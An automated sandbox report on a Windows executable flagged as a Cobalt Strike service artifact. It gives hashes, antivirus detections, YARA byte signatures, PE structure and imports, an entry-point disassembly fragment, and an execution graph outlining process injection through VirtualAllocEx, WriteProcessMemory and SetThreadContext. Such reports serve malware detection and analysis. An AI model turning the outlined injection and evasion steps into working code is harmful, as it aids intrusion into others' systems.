Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8082-svc-x64.exe

Overview

General Information

Sample Name:8082-svc-x64.exe
Analysis ID:780212
MD5:89be3be20ca0dce73c12a5a015bcb9a5
SHA1:4f92b6f168ee8536278fa58a6df5c9b368421030
SHA256:37e828da01820aad58414d0b73c935a0e408c274cdd872cbbae25f9cbcba0b08
Tags:45139105143exeopendir
Infos:

Detection

CobaltStrike
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected CobaltStrike
Multi AV Scanner detection for submitted file
Found API chain indicative of debugger detection
Machine Learning detection for sample
Yara signature match
Found large amount of non-executed APIs
Program does not show much activity (idle)
PE file contains sections with non-standard names

Classification

  • System is w10x64
  • 8082-svc-x64.exe (PID: 6108 cmdline: C:\Users\user\Desktop\8082-svc-x64.exe MD5: 89BE3BE20CA0DCE73C12A5A015BCB9A5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
8082-svc-x64.exeCobaltStrike_Resources_Artifact64_v3_14_to_v4_xCobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.xgssincla@google.com
  • 0xd75:$fmtBuilder: 41 B8 5C 00 00 00 C7 44 24 50 5C 00 00 00 C7 44 24 48 65 00 00 00 C7 44 24 40 70 00 00 00 C7 44 24 38 69 00 00 00 C7 44 24 30 70 00 00 00 C7 44 24 28 5C 00 00 00 C7 44 24 20 2E 00 00 00 89 54 ...
  • 0x44e50:$fmtString: %c%c%c%c%c%c%c%c%cMSSE-%d-server
8082-svc-x64.exeJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
    SourceRuleDescriptionAuthorStrings
    0.2.8082-svc-x64.exe.400000.0.unpackCobaltStrike_Resources_Artifact64_v3_14_to_v4_xCobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.xgssincla@google.com
    • 0xd75:$fmtBuilder: 41 B8 5C 00 00 00 C7 44 24 50 5C 00 00 00 C7 44 24 48 65 00 00 00 C7 44 24 40 70 00 00 00 C7 44 24 38 69 00 00 00 C7 44 24 30 70 00 00 00 C7 44 24 28 5C 00 00 00 C7 44 24 20 2E 00 00 00 89 54 ...
    • 0x44e50:$fmtString: %c%c%c%c%c%c%c%c%cMSSE-%d-server
    0.2.8082-svc-x64.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
      0.0.8082-svc-x64.exe.400000.0.unpackCobaltStrike_Resources_Artifact64_v3_14_to_v4_xCobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.xgssincla@google.com
      • 0xd75:$fmtBuilder: 41 B8 5C 00 00 00 C7 44 24 50 5C 00 00 00 C7 44 24 48 65 00 00 00 C7 44 24 40 70 00 00 00 C7 44 24 38 69 00 00 00 C7 44 24 30 70 00 00 00 C7 44 24 28 5C 00 00 00 C7 44 24 20 2E 00 00 00 89 54 ...
      • 0x44e50:$fmtString: %c%c%c%c%c%c%c%c%cMSSE-%d-server
      0.0.8082-svc-x64.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 8082-svc-x64.exeAvira: detected
        Source: 8082-svc-x64.exeReversingLabs: Detection: 80%
        Source: 8082-svc-x64.exeVirustotal: Detection: 68%Perma Link
        Source: 8082-svc-x64.exeJoe Sandbox ML: detected
        Source: 8082-svc-x64.exe, type: SAMPLEMatched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44
        Source: 0.2.8082-svc-x64.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44
        Source: 0.0.8082-svc-x64.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44
        Source: 8082-svc-x64.exeReversingLabs: Detection: 80%
        Source: 8082-svc-x64.exeVirustotal: Detection: 68%
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00403390 StartServiceCtrlDispatcherA,0_2_00403390
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00403382 StartServiceCtrlDispatcherA,0_2_00403382
        Source: 8082-svc-x64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\8082-svc-x64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00403390 StartServiceCtrlDispatcherA,0_2_00403390
        Source: classification engineClassification label: mal72.troj.evad.winEXE@1/0@0/0
        Source: 8082-svc-x64.exeStatic PE information: section name: .xdata
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00403390 StartServiceCtrlDispatcherA,0_2_00403390
        Source: C:\Users\user\Desktop\8082-svc-x64.exeAPI coverage: 7.2 %
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\8082-svc-x64.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-803
        Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,GetProcAddress,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,0_2_00401180
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00402DD0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00402DD0
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00402D00 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00402D00
        Source: C:\Users\user\Desktop\8082-svc-x64.exeCode function: 0_2_00401790 CreateNamedPipeA,ConnectNamedPipe,WriteFile,WriteFile,CloseHandle,0_2_00401790

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 8082-svc-x64.exe, type: SAMPLE
        Source: Yara matchFile source: 0.2.8082-svc-x64.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.0.8082-svc-x64.exe.400000.0.unpack, type: UNPACKEDPE
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2
        Service Execution
        3
        Windows Service
        3
        Windows Service
        1
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        System Time Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Process Injection
        1
        Process Injection
        LSASS Memory1
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS2
        System Information Discovery
        Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        8082-svc-x64.exe80%ReversingLabsWin64.Backdoor.CobaltStrike
        8082-svc-x64.exe68%VirustotalBrowse
        8082-svc-x64.exe100%AviraHEUR/AGEN.1202022
        8082-svc-x64.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No contacted domains info
        No contacted IP infos
        Joe Sandbox Version:36.0.0 Rainbow Opal
        Analysis ID:780212
        Start date and time:2023-01-08 16:08:04 +01:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 2m 22s
        Hypervisor based Inspection enabled:false
        Report type:full
        Sample file name:8082-svc-x64.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:1
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal72.troj.evad.winEXE@1/0@0/0
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 95.8% (good quality ratio 59.2%)
        • Quality average: 48%
        • Quality standard deviation: 42.8%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 3
        • Number of non-executed functions: 21
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Stop behavior analysis, all processes terminated
        No simulations
        No context
        No context
        No context
        No context
        No context
        No created / dropped files found
        File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
        Entropy (8bit):7.355879244825435
        TrID:
        • Win64 Executable (generic) (12005/4) 74.80%
        • Generic Win/DOS Executable (2004/3) 12.49%
        • DOS Executable Generic (2002/1) 12.47%
        • VXD Driver (31/22) 0.19%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
        File name:8082-svc-x64.exe
        File size:289280
        MD5:89be3be20ca0dce73c12a5a015bcb9a5
        SHA1:4f92b6f168ee8536278fa58a6df5c9b368421030
        SHA256:37e828da01820aad58414d0b73c935a0e408c274cdd872cbbae25f9cbcba0b08
        SHA512:d8490691ad53b026586dad57bb8bc59c8c3c7c9433305d317ad9aa203d9998b4fcf0e514cc562285565a1763dca7f96cfc0c62336a98cea62026dc114908b8a7
        SSDEEP:6144:6p2TnO+/tCo4wsn5PO/ziUZmUhS6b2m+7HUDnivKMpurzC37gmdqDqq7rvxAiS7Y:6onVGia9dqD5uO6lW
        TLSH:4654BF0AE855E917CB4DE07857630F7A27FB9FFEC42519A6313944236F9BA3B98C5200
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......^........../......$...B................@.....................................:......... ............................
        Icon Hash:00828e8e8686b000
        Entrypoint:0x4014b0
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
        DLL Characteristics:
        Time Stamp:0x5EDED518 [Tue Jun 9 00:17:28 2020 UTC]
        TLS Callbacks:0x401af0
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:bed5688a4a2b5ea6984115b458755e90
        Instruction
        dec eax
        sub esp, 28h
        mov dword ptr [00048BB2h], 00000001h
        call 00007FF6849E9B02h
        call 00007FF6849E7F7Dh
        nop
        nop
        dec eax
        add esp, 28h
        ret
        nop
        dec eax
        sub esp, 28h
        mov dword ptr [00048B92h], 00000000h
        call 00007FF6849E9AE2h
        call 00007FF6849E7F5Dh
        nop
        nop
        dec eax
        add esp, 28h
        ret
        nop
        dec eax
        sub esp, 18h
        mov eax, dword ptr [00002B12h]
        test eax, eax
        jle 00007FF6849E82EAh
        cmp dword ptr [00002B0Bh], 00000000h
        jle 00007FF6849E82E1h
        dec eax
        mov edx, dword ptr [00049E42h]
        dec eax
        cwde
        dec eax
        mov dword ptr [ecx+eax], edx
        dec eax
        arpl word ptr [00002AF5h], ax
        dec eax
        mov edx, dword ptr [00049E36h]
        dec eax
        mov dword ptr [ecx+eax], edx
        dec eax
        add esp, 18h
        ret
        push ebx
        dec eax
        sub esp, 00000500h
        dec eax
        mov ebx, dword ptr [edx+08h]
        mov dword ptr [esp+60h], 00100002h
        dec esp
        mov dword ptr [esp+28h], eax
        dec eax
        lea edx, dword ptr [esp+30h]
        dec eax
        mov ecx, ebx
        call dword ptr [00049E1Eh]
        test eax, eax
        dec esp
        mov eax, dword ptr [esp+28h]
        je 00007FF6849E82E6h
        dec esp
        mov dword ptr [esp+000000B0h], eax
        dec eax
        lea edx, dword ptr [esp+30h]
        dec eax
        mov ecx, ebx
        call dword ptr [00049E5Fh]
        test eax, eax
        je 00007FF6849E82CCh
        dec eax
        mov ecx, ebx
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x4b0000xb74.idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x480000x2ac.pdata
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x4d0000x28.tls
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x4b2c00x270.idata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x24000x2400False0.5936414930555556data6.129764070813093IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .data0x40000x424900x42600False0.6019781367702448data7.3657766804633775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rdata0x470000x3100x400False0.4541015625data4.1965610649629825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .pdata0x480000x2ac0x400False0.3740234375data3.1610117624320244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .xdata0x490000x2680x400False0.2587890625data2.847508632820401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
        .bss0x4a0000xa600x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata0x4b0000xb740xc00False0.3372395833333333data4.3479190304641575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .CRT0x4c0000x680x200False0.0703125data0.2694448386073115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .tls0x4d0000x480x200False0.052734375data0.21776995545804623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        DLLImport
        ADVAPI32.dllRegisterServiceCtrlHandlerA, SetServiceStatus, StartServiceCtrlDispatcherA
        KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateProcessA, CreateThread, DeleteCriticalSection, EnterCriticalSection, ExitProcess, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentVariableA, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, LoadLibraryW, QueryPerformanceCounter, ReadFile, ResumeThread, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetThreadContext, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAllocEx, VirtualProtect, VirtualProtectEx, VirtualQuery, WriteFile, WriteProcessMemory
        msvcrt.dll__C_specific_handler, __dllonexit, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _lock, _onexit, _snprintf, _unlock, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
        No network behavior found

        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:16:08:59
        Start date:08/01/2023
        Path:C:\Users\user\Desktop\8082-svc-x64.exe
        Wow64 process (32bit):false
        Commandline:C:\Users\user\Desktop\8082-svc-x64.exe
        Imagebase:0x400000
        File size:289280 bytes
        MD5 hash:89BE3BE20CA0DCE73C12A5A015BCB9A5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low

        Reset < >

          Execution Graph

          Execution Coverage:7.8%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:19.1%
          Total number of Nodes:256
          Total number of Limit Nodes:4
          execution_graph 946 402f40 947 402f64 946->947 948 402f59 946->948 947->948 949 402f7b EnterCriticalSection LeaveCriticalSection 947->949 950 402fc0 951 402fe0 EnterCriticalSection 950->951 952 402fd1 950->952 953 403013 LeaveCriticalSection 951->953 954 402ff9 951->954 956 403020 953->956 954->953 955 402fff free LeaveCriticalSection 954->955 955->956 958 401ac0 959 401ac8 958->959 960 401acd 959->960 963 403060 959->963 962 401ae5 964 4030b0 963->964 965 403069 963->965 968 4030e1 InitializeCriticalSection 964->968 969 4030ba 964->969 966 403080 965->966 967 40306b 965->967 971 40308a 966->971 972 402ed0 3 API calls 966->972 970 403070 967->970 975 402ed0 EnterCriticalSection 967->975 968->969 969->962 970->962 971->970 973 403095 DeleteCriticalSection 971->973 972->971 973->970 976 402f24 975->976 978 402ef1 975->978 977 402f00 TlsGetValue GetLastError 977->978 978->976 978->977 979 402180 980 4021f0 979->980 981 40218f __iob_func fprintf 979->981 983 401902 malloc 984 40191e Sleep 983->984 988 401862 CreateFileA 984->988 987 401937 989 4018dc 988->989 990 4018bd 988->990 991 4018eb CloseHandle 989->991 992 4018bf ReadFile 989->992 990->984 990->987 991->990 992->989 992->991 993 402202 994 4021a0 __iob_func fprintf 993->994 995 403382 996 40338d 995->996 997 40339f StartServiceCtrlDispatcherA 996->997 998 401845 1001 401790 CreateNamedPipeA 998->1001 1002 401804 1001->1002 1003 4017ee ConnectNamedPipe 1001->1003 1003->1002 1006 401823 1003->1006 1004 401832 CloseHandle 1004->1002 1005 401806 WriteFile 1005->1004 1005->1006 1006->1004 1006->1005 1007 403309 GetLastError 1008 403289 VirtualProtectEx 1011 401c50 1014 401ba0 1011->1014 1013 401c59 1015 401bb4 1014->1015 1016 401c35 _onexit 1015->1016 1017 401bbf 1015->1017 1016->1013 1017->1013 1018 4014d0 1019 402d00 5 API calls 1018->1019 1020 4014e3 1019->1020 1021 401180 38 API calls 1020->1021 1022 4014e8 1021->1022 1023 402dd0 RtlCaptureContext RtlLookupFunctionEntry 1024 402eb0 1023->1024 1025 402e0d RtlVirtualUnwind 1023->1025 1026 402e43 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 1024->1026 1025->1026 1026->1024 1029 403158 memcpy 1030 44b4f8 1029->1030 1031 401060 1033 401099 1031->1033 1032 4010a9 __set_app_type 1034 4010b3 1032->1034 1033->1032 1033->1034 1035 401f20 1036 401f42 1035->1036 1037 401f9c signal 1036->1037 1039 402053 signal 1036->1039 1041 40200f signal 1036->1041 1043 401fb7 1036->1043 1037->1036 1038 4020c0 signal 1037->1038 1038->1043 1039->1036 1040 402110 signal 1039->1040 1041->1036 1042 4020f0 signal 1041->1042 1042->1043 1046 401628 1047 401644 1046->1047 1048 40164a GetCurrentProcess 1046->1048 1047->1048 1049 401655 GetEnvironmentVariableA _snprintf CreateProcessA 1047->1049 1050 401705 1048->1050 1049->1050 1051 401739 1049->1051 1050->1051 1053 401588 VirtualAllocEx WriteProcessMemory 1050->1053 1054 4015e4 VirtualProtectEx 1053->1054 1055 40161c 1053->1055 1057 40152b GetThreadContext 1054->1057 1055->1051 1058 40155b SetThreadContext 1057->1058 1059 40157f 1057->1059 1058->1059 1060 401575 ResumeThread 1058->1060 1059->1055 1060->1059 797 4014b0 802 402d00 797->802 799 4014c3 806 401180 799->806 801 4014c8 803 402d40 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 802->803 804 402d29 802->804 805 402d99 803->805 804->799 805->799 807 401472 GetStartupInfoA 806->807 808 4011af 806->808 813 401480 _initterm 807->813 809 401204 808->809 810 4011d6 808->810 811 401213 809->811 812 401434 _amsg_exit 809->812 814 4011ea Sleep 810->814 819 401420 810->819 811->813 816 401221 811->816 815 40123a 812->815 812->816 835 4013fb 813->835 814->810 818 401202 814->818 836 402530 815->836 816->815 817 401450 _initterm 816->817 817->815 818->809 819->811 819->812 826 40131f malloc 827 401344 826->827 828 40138f 826->828 829 401350 strlen malloc memcpy 827->829 867 403390 828->867 829->829 830 401384 829->830 830->828 831 401298 831->826 833 4013ce 834 4013f0 _cexit 833->834 833->835 834->835 835->801 837 401265 SetUnhandledExceptionFilter 836->837 838 402554 836->838 855 401e10 837->855 838->837 839 4025d1 838->839 845 4026b9 838->845 839->837 840 4025da 839->840 847 402606 840->847 870 4022e0 840->870 841 402827 843 402270 19 API calls 841->843 844 402833 843->844 845->837 845->841 846 402709 845->846 845->847 846->845 852 4022e0 19 API calls 846->852 853 4022e0 19 API calls 846->853 904 402270 846->904 847->837 848 402653 VirtualQuery 847->848 850 402809 848->850 851 40266d VirtualProtect 848->851 854 402270 19 API calls 850->854 851->847 852->845 853->846 854->841 856 401e1f 855->856 859 40127e 856->859 940 4028c0 856->940 